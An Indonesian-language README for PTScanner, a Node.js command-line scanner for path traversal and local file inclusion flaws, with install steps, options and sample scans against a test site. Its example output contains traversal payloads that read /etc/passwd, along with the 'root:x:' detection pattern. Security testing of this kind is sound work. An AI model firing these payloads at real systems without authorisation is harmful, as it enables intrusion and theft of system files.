PTScanner adalah alat profesional untuk mendeteksi kerentanan Path Traversal/Local File Inclusion (LFI), di-porting dari ApachSAL versi Python ke Node.js dengan berbagai peningkatan performa dan fitur.
- 20+ Payload Spesifik - Koleksi payload Path Traversal yang terus diperbarui
- Deteksi Akurat - Menggunakan pola regex dan signature khusus
- Multi-Platform - Mendeteksi kerentanan di Unix, Windows, dan aplikasi web
- CLI Powerful - Antarmuka command-line yang mudah digunakan
- Output Terstruktur - Hasil scan dalam format yang mudah dibaca
npm install -g ptscanner
npm install ptscanner
git clone https://github.com/odaysec/ptscanner.git
cd ptscanner
npm install
npm link
Scan target URL:
ptscanner scan --url "http://target.com/vulnerable.php?file=" --output hasil.txt
Opsi | Deskripsi | Default |
---|---|---|
-u, --url |
URL target (harus mengandung parameter) | Required |
-o, --output |
File output untuk menyimpan hasil | results.txt |
-v, --verbose |
Mode verbose (debugging) | false |
ptscanner scan -u "http://example.com/page.php?document="
ptscanner scan -u "http://testphp.vulnweb.com/showimage.php?file=" -o lfi_results.txt
[+] Memulai scan: http://testphp.vulnweb.com/showimage.php?file=
[+] Memuat 20 payload...
[✔] VULN: Basic Directory Traversal (Unix) - Status: 200
[✔] VULN: Null Byte Injection - Status: 200
Scan selesai! Hasil disimpan di: lfi_results.txt
File output akan berisi:
[VULNERABILITY FOUND]
URL: http://testphp.vulnweb.com/showimage.php?file=../../../../etc/passwd
Payload: Basic Directory Traversal (Unix)
Status Code: 200
Detection Pattern: root:x:
---
[VULNERABILITY FOUND]
URL: http://testphp.vulnweb.com/showimage.php?file=....//....//....//....//etc/passwd
Payload: Double Encoding
Status Code: 200
Detection Pattern: root:x:
Anda dapat menambahkan payload custom dengan mengedit file payloads.json
:
{
"name": "Custom Payload",
"path": "custom/traversal/payload",
"pattern": "custom_pattern"
}
Proyek ini dilisensikan di bawah MIT License.